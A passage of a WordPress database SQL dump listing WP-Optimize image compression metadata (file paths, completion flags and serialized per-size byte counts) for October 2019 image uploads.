WP-Optimize'),(164389,181893,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:29205;s:12:\"smushed-size\";i:26886;s:15:\"savings-percent\";d:7.94000000000000039079850466805510222911834716796875;s:10:\"sizes-info\";a:11:{s:4:\"full\";a:2:{s:8:\"original\";i:29205;s:10:\"compressed\";i:26886;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:7438;s:10:\"compressed\";i:7050;}s:6:\"medium\";a:2:{s:8:\"original\";i:16473;s:10:\"compressed\";i:15714;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:30792;s:10:\"compressed\";i:29593;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:1398;s:10:\"compressed\";i:1024;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:25170;s:10:\"compressed\";i:24181;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:12063;s:10:\"compressed\";i:11464;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:15035;s:10:\"compressed\";i:14319;}s:19:\"wcfixedheightmedium\";a:2:{s:8:\"original\";i:36907;s:10:\"compressed\";i:35444;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:9891;s:10:\"compressed\";i:9496;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:30587;s:10:\"compressed\";i:29367;}}}'),(164390,198737,'original-file','2019/10/blue-books-butterfly-updraft-pre-smush-original.jpg'),(164391,198737,'smush-complete','1'),(164392,198737,'smush-info','The file was compressed from 15.76 KB to 15.12 KB saving 4.05 percent using WP-Optimize'),(164393,198737,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:16138;s:12:\"smushed-size\";i:15485;s:15:\"savings-percent\";d:4.04999999999999982236431605997495353221893310546875;s:10:\"sizes-info\";a:8:{s:4:\"full\";a:2:{s:8:\"original\";i:16138;s:10:\"compressed\";i:15485;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:9592;s:10:\"compressed\";i:8906;}s:6:\"medium\";a:2:{s:8:\"original\";i:18806;s:10:\"compressed\";i:17053;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2218;s:10:\"compressed\";i:1776;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:19837;s:10:\"compressed\";i:18147;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:14640;s:10:\"compressed\";i:13235;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:18821;s:10:\"compressed\";i:17127;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:12948;s:10:\"compressed\";i:11772;}}}'),(164394,198739,'original-file','2019/10/boy-leaning-watching-updraft-pre-smush-original.jpg'),(164395,198739,'smush-complete','1'),(164396,198739,'smush-info','The file was compressed from 19.85 KB to 19.07 KB saving 3.93 percent using WP-Optimize'),(164397,198739,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:20329;s:12:\"smushed-size\";i:19530;s:15:\"savings-percent\";d:3.930000000000000159872115546022541821002960205078125;s:10:\"sizes-info\";a:8:{s:4:\"full\";a:2:{s:8:\"original\";i:20329;s:10:\"compressed\";i:19530;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:10643;s:10:\"compressed\";i:9757;}s:6:\"medium\";a:2:{s:8:\"original\";i:20916;s:10:\"compressed\";i:19285;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2121;s:10:\"compressed\";i:1701;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:24216;s:10:\"compressed\";i:22564;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:15966;s:10:\"compressed\";i:14657;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:23344;s:10:\"compressed\";i:21628;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:14192;s:10:\"compressed\";i:13032;}}}'),(164398,198740,'original-file','2019/10/daisy-key-updraft-pre-smush-original.jpg'),(164399,198740,'smush-complete','1'),(164400,198740,'smush-info','The file was compressed from 24.87 KB to 23.64 KB saving 4.95 percent using WP-Optimize'),(164401,198740,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:25471;s:12:\"smushed-size\";i:24211;s:15:\"savings-percent\";d:4.95000000000000017763568394002504646778106689453125;s:10:\"sizes-info\";a:8:{s:4:\"full\";a:2:{s:8:\"original\";i:25471;s:10:\"compressed\";i:24211;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:13015;s:10:\"compressed\";i:11667;}s:6:\"medium\";a:2:{s:8:\"original\";i:24642;s:10:\"compressed\";i:22293;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2349;s:10:\"compressed\";i:1906;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:31190;s:10:\"compressed\";i:28340;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:18984;s:10:\"compressed\";i:17204;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:28291;s:10:\"compressed\";i:25619;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:17102;s:10:\"compressed\";i:15509;}}}'),(164402,198741,'original-file','2019/10/flower-stump-updraft-pre-smush-original.jpg'),(164403,198741,'smush-complete','1'),(164404,198741,'smush-info','The file was compressed from 19.37 KB to 18.80 KB saving 2.93 percent using WP-Optimize'),(164405,198741,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:19833;s:12:\"smushed-size\";i:19251;s:15:\"savings-percent\";d:2.930000000000000159872115546022541821002960205078125;s:10:\"sizes-info\";a:8:{s:4:\"full\";a:2:{s:8:\"original\";i:19833;s:10:\"compressed\";i:19251;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:10128;s:10:\"compressed\";i:9417;}s:6:\"medium\";a:2:{s:8:\"original\";i:18647;s:10:\"compressed\";i:17176;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2117;s:10:\"compressed\";i:1685;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:21963;s:10:\"compressed\";i:20361;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:14405;s:10:\"compressed\";i:13185;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:20605;s:10:\"compressed\";i:18957;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:13199;s:10:\"compressed\";i:12072;}}}'),(164406,198742,'original-file','2019/10/flower-water-updraft-pre-smush-original.jpg'),(164407,198742,'smush-complete','1'),(164408,198742,'smush-info','The file was compressed from 16.79 KB to 16.09 KB saving 4.13 percent using WP-Optimize'),(164409,198742,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:17190;s:12:\"smushed-size\";i:16480;s:15:\"savings-percent\";d:4.12999999999999989341858963598497211933135986328125;s:10:\"sizes-info\";a:6:{s:4:\"full\";a:2:{s:8:\"original\";i:17190;s:10:\"compressed\";i:16480;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:10443;s:10:\"compressed\";i:9506;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2252;s:10:\"compressed\";i:1808;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:17327;s:10:\"compressed\";i:15820;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:18473;s:10:\"compressed\";i:16876;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:13561;s:10:\"compressed\";i:12373;}}}'),(164410,198743,'original-file','2019/10/forest-light-updraft-pre-smush-original.jpg'),(164411,198743,'smush-complete','1'),(164412,198743,'smush-info','The file was compressed from 42.47 KB to 39.15 KB saving 7.81 percent using WP-Optimize'),(164413,198743,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:43487;s:12:\"smushed-size\";i:40090;s:15:\"savings-percent\";d:7.80999999999999960920149533194489777088165283203125;s:10:\"sizes-info\";a:8:{s:4:\"full\";a:2:{s:8:\"original\";i:43487;s:10:\"compressed\";i:40090;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:17477;s:10:\"compressed\";i:15453;}s:6:\"medium\";a:2:{s:8:\"original\";i:35805;s:10:\"compressed\";i:31708;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2594;s:10:\"compressed\";i:2142;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:45098;s:10:\"compressed\";i:40522;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:26352;s:10:\"compressed\";i:23349;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:39975;s:10:\"compressed\";i:35425;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:23610;s:10:\"compressed\";i:20965;}}}'),(164414,198744,'original-file','2019/10/kitty-flower-updraft-pre-smush-original.jpg'),(164415,198744,'smush-complete','1'),(164416,198744,'smush-info','The file was compressed from 18.19 KB to 17.40 KB saving 4.36 percent using WP-Optimize'),(164417,198744,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:18626;s:12:\"smushed-size\";i:17814;s:15:\"savings-percent\";d:4.36000000000000031974423109204508364200592041015625;s:10:\"sizes-info\";a:8:{s:4:\"full\";a:2:{s:8:\"original\";i:18626;s:10:\"compressed\";i:17814;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:11126;s:10:\"compressed\";i:10038;}s:6:\"medium\";a:2:{s:8:\"original\";i:23700;s:10:\"compressed\";i:21613;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2234;s:10:\"compressed\";i:1789;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:26752;s:10:\"compressed\";i:24500;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:18266;s:10:\"compressed\";i:16588;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:20580;s:10:\"compressed\";i:18749;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:14809;s:10:\"compressed\";i:13434;}}}'),(164418,198745,'original-file','2019/10/lake-bench-updraft-pre-smush-original.jpg'),(164419,198745,'smush-complete','1'),(164420,198745,'smush-info','The file was compressed from 31.09 KB to 29.00 KB saving 6.73 percent using WP-Optimize'),(164421,198745,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:31833;s:12:\"smushed-size\";i:29691;s:15:\"savings-percent\";d:6.730000000000000426325641456060111522674560546875;s:10:\"sizes-info\";a:8:{s:4:\"full\";a:2:{s:8:\"original\";i:31833;s:10:\"compressed\";i:29691;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:13281;s:10:\"compressed\";i:11903;}s:6:\"medium\";a:2:{s:8:\"original\";i:31100;s:10:\"compressed\";i:27538;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2332;s:10:\"compressed\";i:1893;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:36386;s:10:\"compressed\";i:32705;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:23323;s:10:\"compressed\";i:20747;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:35284;s:10:\"compressed\";i:31353;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:19892;s:10:\"compressed\";i:17694;}}}'),(164422,198746,'original-file','2019/10/leaves-sphere-updraft-pre-smush-original.jpg'),(164423,198746,'smush-complete','1'),(164424,198746,'smush-info','The file was compressed from 25.34 KB to 24.14 KB saving 4.74 percent using WP-Optimize'),(164425,198746,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:25944;s:12:\"smushed-size\";i:24715;s:15:\"savings-percent\";d:4.7400000000000002131628207280300557613372802734375;s:10:\"sizes-info\";a:8:{s:4:\"full\";a:2:{s:8:\"original\";i:25944;s:10:\"compressed\";i:24715;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:10415;s:10:\"compressed\";i:9508;}s:6:\"medium\";a:2:{s:8:\"original\";i:23903;s:10:\"compressed\";i:21710;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2084;s:10:\"compressed\";i:1689;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:27146;s:10:\"compressed\";i:24926;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:18457;s:10:\"compressed\";i:16656;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:27090;s:10:\"compressed\";i:24579;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:15591;s:10:\"compressed\";i:14175;}}}'),(164426,198748,'original-file','2019/10/purple-tree-updraft-pre-smush-original.jpg'),(164427,198748,'smush-complete','1'),(164428,198748,'smush-info','The file was compressed from 36.44 KB to 34.06 KB saving 6.52 percent using WP-Optimize'),(164429,198748,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:37313;s:12:\"smushed-size\";i:34881;s:15:\"savings-percent\";d:6.519999999999999573674358543939888477325439453125;s:10:\"sizes-info\";a:8:{s:4:\"full\";a:2:{s:8:\"original\";i:37313;s:10:\"compressed\";i:34881;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:14926;s:10:\"compressed\";i:13321;}s:6:\"medium\";a:2:{s:8:\"original\";i:32083;s:10:\"compressed\";i:28475;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2462;s:10:\"compressed\";i:2015;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:39182;s:10:\"compressed\";i:35194;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:23923;s:10:\"compressed\";i:21315;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:35689;s:10:\"compressed\";i:31677;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:21053;s:10:\"compressed\";i:18788;}}}'),(164430,198749,'original-file','2019/10/seashell-ocean-updraft-pre-smush-original.jpg'),(164431,198749,'smush-complete','1'),(164432,198749,'smush-info','The file was compressed from 28.36 KB to 26.81 KB saving 5.47 percent using WP-Optimize'),(164433,198749,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:29040;s:12:\"smushed-size\";i:27451;s:15:\"savings-percent\";d:5.46999999999999975131004248396493494510650634765625;s:10:\"sizes-info\";a:8:{s:4:\"full\";a:2:{s:8:\"original\";i:29040;s:10:\"compressed\";i:27451;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:13153;s:10:\"compressed\";i:11825;}s:6:\"medium\";a:2:{s:8:\"original\";i:29265;s:10:\"compressed\";i:26267;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2355;s:10:\"compressed\";i:1921;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:32931;s:10:\"compressed\";i:29700;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:22146;s:10:\"compressed\";i:19853;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:27452;s:10:\"compressed\";i:24612;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:18427;s:10:\"compressed\";i:16540;}}}'),(164434,198750,'original-file','2019/10/sphere-nature-updraft-pre-smush-original.jpg'),(164435,198750,'smush-complete','1'),(164436,198750,'smush-info','The file was compressed from 23.73 KB to 22.15 KB saving 6.63 percent using WP-Optimize'),(164437,198750,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:24298;s:12:\"smushed-size\";i:22686;s:15:\"savings-percent\";d:6.62999999999999989341858963598497211933135986328125;s:10:\"sizes-info\";a:8:{s:4:\"full\";a:2:{s:8:\"original\";i:24298;s:10:\"compressed\";i:22686;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:13240;s:10:\"compressed\";i:11856;}s:6:\"medium\";a:2:{s:8:\"original\";i:27952;s:10:\"compressed\";i:25005;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2369;s:10:\"compressed\";i:1933;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:29701;s:10:\"compressed\";i:26782;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:21277;s:10:\"compressed\";i:18994;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:26539;s:10:\"compressed\";i:23756;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:17625;s:10:\"compressed\";i:15769;}}}'),(164438,198751,'original-file','2019/10/starfish-dancing-updraft-pre-smush-original.jpg'),(164439,198751,'smush-complete','1'),(164440,198751,'smush-info','The file was compressed from 17.25 KB to 16.56 KB saving 4.01 percent using WP-Optimize'),(164441,198751,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:17666;s:12:\"smushed-size\";i:16957;s:15:\"savings-percent\";d:4.0099999999999997868371792719699442386627197265625;s:10:\"sizes-info\";a:8:{s:4:\"full\";a:2:{s:8:\"original\";i:17666;s:10:\"compressed\";i:16957;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:11705;s:10:\"compressed\";i:10640;}s:6:\"medium\";a:2:{s:8:\"original\";i:22819;s:10:\"compressed\";i:21019;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2262;s:10:\"compressed\";i:1835;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:24884;s:10:\"compressed\";i:22995;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:17432;s:10:\"compressed\";i:15985;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:21418;s:10:\"compressed\";i:19711;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:14646;s:10:\"compressed\";i:13453;}}}'),(164442,198752,'original-file','2019/10/tiny-tree-in-glass-updraft-pre-smush-original.jpg'),(164443,198752,'smush-complete','1'),(164444,198752,'smush-info','The file was compressed from 18.87 KB to 18.00 KB saving 4.64 percent using WP-Optimize'),(164445,198752,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:19326;s:12:\"smushed-size\";i:18429;s:15:\"savings-percent\";d:4.63999999999999968025576890795491635799407958984375;s:10:\"sizes-info\";a:8:{s:4:\"full\";a:2:{s:8:\"original\";i:19326;s:10:\"compressed\";i:18429;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:11080;s:10:\"compressed\";i:9951;}s:6:\"medium\";a:2:{s:8:\"original\";i:20040;s:10:\"compressed\";i:18064;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2256;s:10:\"compressed\";i:1822;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:22271;s:10:\"compressed\";i:20371;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:15589;s:10:\"compressed\";i:14003;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:22345;s:10:\"compressed\";i:20279;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:13745;s:10:\"compressed\";i:12453;}}}'),(164446,198776,'original-file','2019/10/tree-blue-lake-updraft-pre-smush-original.jpg'),(164447,198776,'smush-complete','1'),(164448,198776,'smush-info','The file was compressed from 17.44 KB to 16.76 KB saving 3.88 percent using WP-Optimize'),(164449,198776,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:17856;s:12:\"smushed-size\";i:17163;s:15:\"savings-percent\";d:3.87999999999999989341858963598497211933135986328125;s:10:\"sizes-info\";a:8:{s:4:\"full\";a:2:{s:8:\"original\";i:17856;s:10:\"compressed\";i:17163;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:9798;s:10:\"compressed\";i:9126;}s:6:\"medium\";a:2:{s:8:\"original\";i:19757;s:10:\"compressed\";i:18179;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2135;s:10:\"compressed\";i:1698;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:21395;s:10:\"compressed\";i:19695;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:15213;s:10:\"compressed\";i:13930;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:19910;s:10:\"compressed\";i:18338;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:13155;s:10:\"compressed\";i:12053;}}}'),(164450,198800,'original-file','2019/10/harold-bg-tabs-A-updraft-pre-smush-original.jpg'),(164451,198800,'smush-complete','1'),(164452,198800,'smush-info','The file was compressed from 10.04 KB to 9.65 KB saving 3.85 percent using WP-Optimize'),(164453,198800,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:10282;s:12:\"smushed-size\";i:9886;s:15:\"savings-percent\";d:3.850000000000000088817841970012523233890533447265625;s:10:\"sizes-info\";a:5:{s:4:\"full\";a:2:{s:8:\"original\";i:10282;s:10:\"compressed\";i:9886;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:9782;s:10:\"compressed\";i:9050;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2302;s:10:\"compressed\";i:1861;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:10179;s:10:\"compressed\";i:9445;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:10410;s:10:\"compressed\";i:9480;}}}'),(164454,198801,'original-file','2019/10/harold-bg-tabs-B-updraft-pre-smush-original.jpg'),(164455,198801,'smush-complete','1'),(164456,198801,'smush-info','The file was compressed from 12.33 KB to 11.81 KB saving 4.2 percent using WP-Optimize'),(164457,198801,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:12625;s:12:\"smushed-size\";i:12095;s:15:\"savings-percent\";d:4.20000000000000017763568394002504646778106689453125;s:10:\"sizes-info\";a:5:{s:4:\"full\";a:2:{s:8:\"original\";i:12625;s:10:\"compressed\";i:12095;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:11377;s:10:\"compressed\";i:10377;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2206;s:10:\"compressed\";i:1776;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:12814;s:10:\"compressed\";i:11648;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:12798;s:10:\"compressed\";i:11747;}}}'),(164458,198802,'original-file','2019/10/harold-bg-tabs-C-updraft-pre-smush-original.jpg'),(164459,198802,'smush-complete','1'),(164460,198802,'smush-info','The file was compressed from 10.66 KB to 10.20 KB saving 4.27 percent using WP-Optimize'),(164461,198802,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:10913;s:12:\"smushed-size\";i:10447;s:15:\"savings-percent\";d:4.269999999999999573674358543939888477325439453125;s:10:\"sizes-info\";a:5:{s:4:\"full\";a:2:{s:8:\"original\";i:10913;s:10:\"compressed\";i:10447;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:9714;s:10:\"compressed\";i:9090;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2119;s:10:\"compressed\";i:1702;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:11387;s:10:\"compressed\";i:10384;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:10744;s:10:\"compressed\";i:9925;}}}'),(164462,198803,'original-file','2019/10/harold-bg-tabs-D-updraft-pre-smush-original.jpg'),(164463,198803,'smush-complete','1'),(164464,198803,'smush-info','The file was compressed from 731.85 KB to 26.91 KB saving 96.32 percent using WP-Optimize'),(164465,198803,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:749418;s:12:\"smushed-size\";i:27552;s:15:\"savings-percent\";d:96.31999999999999317878973670303821563720703125;s:10:\"sizes-info\";a:5:{s:4:\"full\";a:2:{s:8:\"original\";i:749418;s:10:\"compressed\";i:27552;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:9736;s:10:\"compressed\";i:9215;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:1946;s:10:\"compressed\";i:1531;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:14253;s:10:\"compressed\";i:13142;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:13123;s:10:\"compressed\";i:12057;}}}'),(164466,198804,'original-file','2019/10/harold-bg-tabs-E-updraft-pre-smush-original.jpg'),(164467,198804,'smush-complete','1'),(164468,198804,'smush-info','The file was compressed from 18.94 KB to 17.90 KB saving 5.51 percent using WP-Optimize'),(164469,198804,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:19399;s:12:\"smushed-size\";i:18331;s:15:\"savings-percent\";d:5.5099999999999997868371792719699442386627197265625;s:10:\"sizes-info\";a:6:{s:4:\"full\";a:2:{s:8:\"original\";i:19399;s:10:\"compressed\";i:18331;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:12380;s:10:\"compressed\";i:11140;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2498;s:10:\"compressed\";i:2035;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:23187;s:10:\"compressed\";i:20917;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:18735;s:10:\"compressed\";i:16901;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:15927;s:10:\"compressed\";i:14370;}}}'),(164470,198805,'original-file','2019/10/harold-bg-tabs-F-updraft-pre-smush-original.jpg'),(164471,198805,'smush-complete','1'),(164472,198805,'smush-info','The file was compressed from 9.78 KB to 9.33 KB saving 4.53 percent using WP-Optimize'),(164473,198805,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:10012;s:12:\"smushed-size\";i:9558;s:15:\"savings-percent\";d:4.53000000000000024868995751603506505489349365234375;s:10:\"sizes-info\";a:5:{s:4:\"full\";a:2:{s:8:\"original\";i:10012;s:10:\"compressed\";i:9558;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:9271;s:10:\"compressed\";i:8610;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2082;s:10:\"compressed\";i:1648;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:10842;s:10:\"compressed\";i:9820;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:9832;s:10:\"compressed\";i:9103;}}}'),(164474,198806,'original-file','2019/10/harold-bg-tabs-G-updraft-pre-smush-original.jpg'),(164475,198806,'smush-complete','1'),(164476,198806,'smush-info','The file was compressed from 18.87 KB to 17.90 KB saving 5.15 percent using WP-Optimize'),(164477,198806,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:19325;s:12:\"smushed-size\";i:18330;s:15:\"savings-percent\";d:5.1500000000000003552713678800500929355621337890625;s:10:\"sizes-info\";a:6:{s:4:\"full\";a:2:{s:8:\"original\";i:19325;s:10:\"compressed\";i:18330;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:12505;s:10:\"compressed\";i:11210;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2612;s:10:\"compressed\";i:2128;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:21992;s:10:\"compressed\";i:19827;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:18603;s:10:\"compressed\";i:16721;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:15970;s:10:\"compressed\";i:14336;}}}'),(164478,198807,'original-file','2019/10/harold-klemp-smtabs-1-updraft-pre-smush-original.jpg'),(164479,198807,'smush-complete','1'),(164480,198807,'smush-info','The file was compressed from 7.19 KB to 6.76 KB saving 6.02 percent using WP-Optimize'),(164481,198807,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:7361;s:12:\"smushed-size\";i:6918;s:15:\"savings-percent\";d:6.019999999999999573674358543939888477325439453125;s:10:\"sizes-info\";a:3:{s:4:\"full\";a:2:{s:8:\"original\";i:7361;s:10:\"compressed\";i:6918;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:9200;s:10:\"compressed\";i:8551;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2096;s:10:\"compressed\";i:1693;}}}'),(164482,198903,'original-file','2019/10/island-heart-updraft-pre-smush-original.jpg'),(164483,198903,'smush-complete','1'),(164484,198903,'smush-info','The file was compressed from 17.69 KB to 16.99 KB saving 3.98 percent using WP-Optimize'),(164485,198903,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:18115;s:12:\"smushed-size\";i:17394;s:15:\"savings-percent\";d:3.979999999999999982236431605997495353221893310546875;s:10:\"sizes-info\";a:8:{s:4:\"full\";a:2:{s:8:\"original\";i:18115;s:10:\"compressed\";i:17394;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:9631;s:10:\"compressed\";i:8844;}s:6:\"medium\";a:2:{s:8:\"original\";i:17589;s:10:\"compressed\";i:16016;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2217;s:10:\"compressed\";i:1764;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:20971;s:10:\"compressed\";i:19139;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:13690;s:10:\"compressed\";i:12352;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:19513;s:10:\"compressed\";i:17787;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:12743;s:10:\"compressed\";i:11489;}}}'),(164486,198904,'original-file','2019/10/orange-flowers-updraft-pre-smush-original.jpg'),(164487,198904,'smush-complete','1'),(164488,198904,'smush-info','The file was compressed from 20.03 KB to 19.08 KB saving 4.74 percent using 